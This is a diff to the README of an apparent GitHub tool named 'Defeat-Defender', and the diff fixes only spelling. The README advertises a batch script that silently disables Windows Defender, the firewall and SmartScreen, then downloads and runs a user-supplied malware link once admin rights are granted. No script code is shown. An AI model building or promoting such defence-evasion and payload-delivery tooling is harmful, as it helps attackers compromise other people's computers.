swagkarna/Defeat-Defender-V1.2.0/README.md

 ---
 * **If you like the tool and for my personal motivation so as to develop other tools please  leave a +1 star**

-### Powerfull Batch File To Disable Windows Defender,Firewall,Smartscreen And Execute the payload
+### Powerful Batch File To Disable Windows Defender,Firewall, Smartscreen And Execute the payload
 ### Usage :
 * Run `run.bat` and enter the direct link of your malware
 * Run the script "Defeat-Defender.bat" .
 It will ask for Admin Permission.If permission Granted The script will work Silently and dismantle all protection...